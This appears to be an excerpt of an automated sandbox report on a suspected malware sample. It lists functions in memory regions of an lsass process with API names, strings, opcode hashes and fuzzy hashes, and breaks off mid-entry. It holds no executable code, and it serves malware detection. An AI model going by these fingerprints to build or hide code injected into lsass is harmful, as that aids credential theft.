                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: fd890a10e18ff91e2345af510b04503e6d001258bbebb589a967ba1f92d71b91
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 81113936B45B8182FF159B23E4082A972A0FB8CBA5F640029DF9D077A4EF3DC905C745
                                                                          Function 00000140AE862F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: a2d052cb6962f498e3cef9ed57c0a8daa6a62b61da821da8834fd8d960af75c0
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: D231B332741B5182EB26DF1BE5447A9A7A0FB4DBA4F2881209F4C47B75EF34C8A5C781
                                                                          Function 00000140AE86CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: b1e378f208745640ce80b78c559ffaa0a20b0e3a8eff5e4311b7b060cf634d78
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: F3112E3028534081FA66AB635A553A962416B9C7F4F344B24EE3E476FADE78DC01D6C3
                                                                          Function 00000140AE872058 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID: F]:82
                                                                          • API String ID: 2718003287-2422748741
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: 4b0a4d86e2932106c0371b6ae4a27eadaf1a36e0bf94906de29ca74a04e3cc8d
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: 44D1D072B54B8089E712CFAAD5403EC3BB1F3587A8F244216CF5D97BA9DA34C946C381
                                                                          Function 00000140AE86199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 9022e9ca5b0b5f71c7b82a84b25e46de0569a46428ab685b711a92cff19137a4
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: A5015731740B4082EB51DB53A848799A3A1F78CBD1FA84035DF4D43B65DE38C989C781
                                                                          Function 00000140AE8636C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: 301de5e6a3bc59086d6f9150b82df67b6d6c22bbab0207dc7c03168e1951e1a1
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 01015774651B40C2EB269B23E81879973A0BB9DBA2F240428CF4D07774EF3CC908C782
                                                                          Function 00000140AE868FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: bd338bf40550659d0ab490f789d63c081b601061abea68a920c6aca0165ba548
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: 8351A13265170086EB16CB16E848B9937A6F348BA8F318524DF1A477E8DB3DCC41C782
                                                                          Function 00000140AE867960 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID: F]:82
                                                                          • API String ID: 2933794660-2422748741
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: a5c049cb69e96cfbb56616fdcd891d3e75a6c1cb872cb67dafead8936c6c1fcc
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: 28110632B50B018AEB008B61E8542A833A4F719768F540E21DF6D87BA4DF78C598D2C1
                                                                          Function 00000140AE863044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 0e89825c8f5d70b27a483a01b8d98a85527b4973c2a0efa788cb30948269fb2a
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: A6F05E30644B8082EB058B53B9041996261AB8CFE0F245020EF4E07B78DE38C849C782
                                                                          Function 00000140AE86BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: 0a5f03d881548423950f550b58b8fc74d35f60bbb561fa5f685fc2d061d5bb49
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 7EF06D71655B0582EB128B26E8443A97320EB8CBB5F740219CF6E472F4CF3DC948D381
                                                                          Function 00000140AE8650D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: 73fda85837acdd30ad006dc6ccb1667200e15de9212539d4e27f8f5c03466d3a
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: 2702FA32259B8486EB61DB56F49439AB7A1F7C8794F200415EB8E87BB8DF7CC844CB41
                                                                          Function 00000140AE865710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: 819f4eb226d638b22eb9453569fbd0dff2ed878ae5cb7d9cc285f1354ad887c7
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: 9B61C536559B44C6E7629B16F48439AB7A0F7887A4F600515EF8E47BB8DF7CC840CB82
                                                                          Function 00000140ADFD3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 2e1910b8291bafd17102f3214c72d3e729590e13e78c3872cab4fc5f060f1e3e
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 22115472614B5353FA56162AE4553EB31C36F5C37CF784628AFE6076F68A34E8436200
                                                                          Function 00000140AE874104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 28d524a13795f3523b3f1b4b207150eb2f338f5cab7179f9a4c1ef00b7941454
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: DC119132AD0B5011F667256AD4913E531446B6DBB8F390624AF7E176F68B34CC41C2A2
                                                                          Function 00000140ADFCF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 48ac8b7a938d00f4a24374fee49c64dd94bfb0dfea2bd827f35d3ab40a9a7452
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 3961B43652234853FA6B8B67E5443EBBAA3EF8D748F744415CB46077B4DB34C967A200
                                                                          Function 00000140AE86AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 1c54ac8669fca167ed3fb4a5461af2b1e7039b1515757cf07daf6e620200d245
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: B6619F33640B848AEB11DF66D4403DD77A0F748BA8F244256EF4E17BA9DB38C995C781
                                                                          Function 00000140ADFCA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 5e9ed10956360af88f8a3a4b9cf73a15bede84b98f5d365089c0e3503e132e06
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: B751E432120388CBEB658B6794443DA37A3FB58B84F244117DB4947BE5CB39E5A2E700
                                                                          Function 00000140AE86AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 6cac39d5d8876cbc65fde025732dcd94be71c236f1742025846821184820e854
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: D951AF72180780CAEB768F17958439977A0F358BA8F244256DF9D47BE5CB38D890D782
                                                                          Function 00000140ADFC8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: 595c9e32b9df4e514150441d0aa3e925450171a8e5ef433ea7709e32150aded9
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: E551E43272170487DB96CF16D404BEA3797FB48BA8F318424DB06437A8EBB4C952A704
                                                                          Function 00000140AE8726F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: F]:82$U
                                                                          • API String ID: 442123175-3311195430
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 3e73605a521e4cce57338457d13aec77e0fda4a33a28f7c4ac6780cba42ba59d
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 48417172615B8086DB219F6AE8443E977A1F7987A4F604025EF4D87BA4DB3CC941C781
                                                                          Function 00000140ADFC83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: fdcdef5ba31d8dbb8912a9a905e6b67567b4155f9952f6a6302e3e1a43461dee
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 4831CF3122174487E792DF13E844BDA37A7FB48B98F258414EF8A037A8CB38C952D704
                                                                          Function 00000140AE8614A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: e0938be913c4546f92e354b3f490316f5aad01bc8c73eed3b2a93003b4ccae50
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 4C015A32A40B90C6E706DF67E94828A77A1F78DFA1F244425EF4E4372ADE38C851C791
                                                                          Function 00000140AE872980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: bfe30e0d5e1943aced18828ddcaefd42f41aed77c308e3009ff5d43c7c6b682c
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: A491AFB264075085F762DF6A94803ED3BA4F758BA8F744109DF4E67AA5DB34CC82C782
                                                                          Function 00000140AE86ED0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CodeInfoPageValid
                                                                          • String ID: F]:82
                                                                          • API String ID: 546120528-2422748741
                                                                          • Opcode ID: 40efbe512c95442b741ef5282b0f0ea723fdf90a90a36b1dcf043ddce602893b
                                                                          • Instruction ID: d125a4f93937241524de0fefc819b88b41a8e2e2b8d20653646faecf594ba604
                                                                          • Opcode Fuzzy Hash: 40efbe512c95442b741ef5282b0f0ea723fdf90a90a36b1dcf043ddce602893b
                                                                          • Instruction Fuzzy Hash: A381B472696B8086FB678F2B90443E977A1E34C7A0F744015EF8E476B1DA39DE45C382
                                                                          Function 00000140AE86DA9C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: *?$F]:82
                                                                          • API String ID: 3215553584-3155920265
                                                                          • Opcode ID: 30879497fba94220c0d251822a22f2ad6c70dac2b1e9d214631859fe890dbacb
                                                                          • Instruction ID: eff97464bcbd58d6b6d9f7402abaaa834f26dc8138b11644abf34dda11de57b8
                                                                          • Opcode Fuzzy Hash: 30879497fba94220c0d251822a22f2ad6c70dac2b1e9d214631859fe890dbacb
                                                                          • Instruction Fuzzy Hash: 1D51AF7278075445EB62AB6799113ED67A1A74CBF8F244511DF0D0BBEEEA78C841C382
                                                                          Function 00000140ADFC9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: fd2f36d4469ca00d580b9035ee875e4ebab09abcf6c64778c8a765e7c8b01963
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: E9619F33610B888AEB21DF66D0403DE77B2FB48B89F244215EF4917BA8DB38D166D700
                                                                          Function 00000140AE862330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: c9d078df74486e421dded553d044dc307dfc5948a87b49d5b9b062cc3c97baf6
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: EE51E03228438181E676DB2FA1583EAA791F3CD7A4F640165DF4D03BAADA39CD44C7C2
                                                                          Function 00000140AE86E780 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Info
                                                                          • String ID: $F]:82
                                                                          • API String ID: 1807457897-2256556325
                                                                          • Opcode ID: c93f3108f4eee44b47daab660e7931f0d47a2e098f42ae2a4485b6e8a39e27b2
